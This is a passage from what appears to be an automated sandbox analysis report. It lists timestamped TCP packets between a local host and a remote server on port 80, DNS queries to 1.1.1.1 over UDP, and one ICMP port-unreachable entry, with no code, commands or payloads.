                                                      Dec 20, 2024 17:05:56.832214117 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832262993 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.832290888 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832315922 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832369089 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.832405090 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832410097 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832456112 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.832524061 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832555056 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832619905 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.832669020 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832674980 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832729101 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.832819939 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832825899 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832881927 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.832926035 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832931995 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832941055 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832945108 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.832998991 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833111048 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833116055 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833121061 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833125114 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833173037 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833213091 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833218098 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833228111 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833231926 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833285093 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833324909 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833331108 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833389997 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833524942 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833539009 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833595037 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833700895 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833751917 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833774090 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833811998 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833816051 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833841085 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833859921 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833918095 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833951950 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.833967924 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.833992004 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834059954 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834067106 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834117889 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834120035 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834158897 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834187984 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834192038 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834214926 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834255934 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834280968 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834336996 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834337950 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834346056 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834367990 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834398985 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834433079 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834470034 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834475040 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834527016 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834567070 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834572077 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834615946 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.834671021 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834676027 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834779978 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834817886 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834821939 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.834984064 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835007906 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835011959 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835055113 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835059881 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835067034 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835099936 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835194111 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835201025 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835248947 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835249901 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835270882 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835303068 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835315943 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835349083 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835370064 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835402012 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835408926 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835426092 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835453033 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835481882 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835513115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835517883 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835560083 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.835575104 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835581064 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835690022 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835694075 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835737944 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.835743904 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.874133110 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.874218941 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.946073055 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.946384907 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.950656891 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.950669050 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.950829029 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.950942993 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.950956106 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.950968027 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.951442957 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.951487064 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.951543093 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.951587915 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.952497005 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.952512980 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.952645063 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.952687025 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.952698946 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953049898 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953066111 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953244925 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953259945 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953768015 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953778982 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953819036 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953905106 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.953916073 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.954266071 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.954305887 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.954427004 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.954438925 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.954981089 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955018997 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955108881 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955141068 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955235004 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955426931 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955476999 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955569983 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.955579996 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956032991 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956080914 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956192017 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956290960 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956393003 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956676960 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956690073 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956788063 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.956798077 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.957226038 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.957298994 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.957427979 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.957437992 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.957478046 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958095074 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958106041 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958174944 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958184958 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958270073 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958350897 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958389044 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958405972 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958538055 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958561897 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958695889 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958717108 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958802938 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.958851099 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959135056 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959177971 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959268093 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959287882 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959346056 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959400892 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959453106 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959470034 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959523916 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959542036 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959718943 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959741116 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959831953 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959852934 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.959989071 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960000992 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960015059 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960036039 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960084915 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960146904 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960196972 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960238934 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960295916 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960306883 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960386992 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960397005 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960429907 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960481882 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960541010 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960551023 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960633993 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960645914 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960774899 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960783958 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960839033 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960848093 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960944891 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960957050 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.960999966 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961081028 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961155891 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961231947 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961245060 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961261988 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961337090 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961348057 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961380005 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961426973 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961478949 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961497068 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961582899 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961637020 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961698055 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961707115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961725950 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961822033 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961913109 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961930037 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962290049 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962351084 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962455988 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962466002 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962508917 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962521076 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962591887 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962610006 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962742090 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962800026 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962901115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962909937 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962999105 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963017941 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963073969 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963092089 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963151932 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963248014 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963258028 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963270903 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963423014 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963434935 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963481903 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963515043 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963587999 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963598013 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963640928 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963650942 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963721991 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963776112 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963843107 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963851929 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963946104 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963954926 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964062929 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964075089 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964086056 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964097977 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964176893 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964188099 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964411974 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964422941 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964432955 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964446068 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964457035 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964468002 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964481115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:06:19.810384989 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:06:19.810739040 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:06:19.810966015 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:06:19.811012983 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:06:19.930526018 CET8049725147.45.113.159192.168.2.6

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 17:05:18.552548885 CET6040653192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:05:18.552608013 CET6040653192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:05:18.689405918 CET53604061.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:05:18.691819906 CET53604061.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:05:21.685854912 CET6040953192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:05:21.686286926 CET6040953192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:05:21.981304884 CET53604091.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:05:22.090008020 CET53604091.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:05:55.272933006 CET5018953192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:05:55.272985935 CET5018953192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:05:55.410984039 CET53501891.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:05:55.411153078 CET53501891.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:19.947207928 CET5587053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:19.947326899 CET5587053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:19.947391033 CET5587053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.086015940 CET53558701.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.086029053 CET53558701.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.086040020 CET53558701.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.372026920 CET5587253192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.372117043 CET5587253192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.372179985 CET5587253192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.566447973 CET53558721.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.566458941 CET53558721.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.566469908 CET53558721.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.759303093 CET5587453192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.759397030 CET5587453192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.759463072 CET5587453192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:20.898516893 CET53558741.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.898525953 CET53558741.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:20.898648024 CET53558741.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.115068913 CET5587653192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.115140915 CET5587653192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.115201950 CET5587653192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.252844095 CET53558761.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.252927065 CET53558761.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.253576994 CET53558761.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.535929918 CET5587853192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.536309004 CET5587853192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.536426067 CET5587853192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.674328089 CET53558781.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.674341917 CET53558781.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.674352884 CET53558781.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:21.908564091 CET5588053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.908843994 CET5588053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.908910036 CET5588053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.908963919 CET5588053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.911307096 CET5588053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:21.911392927 CET5588053192.168.2.61.1.1.1
                                                      Dec 20, 2024 17:06:22.051959038 CET53558801.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:22.053455114 CET53558801.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:22.053478956 CET53558801.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:22.053499937 CET53558801.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:22.053535938 CET53558801.1.1.1192.168.2.6
                                                      Dec 20, 2024 17:06:22.053790092 CET53558801.1.1.1192.168.2.6

                                                      ICMP Packets

                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Dec 20, 2024 17:06:21.253710032 CET192.168.2.61.1.1.1c208(Port unreachable)Destination Unreachable
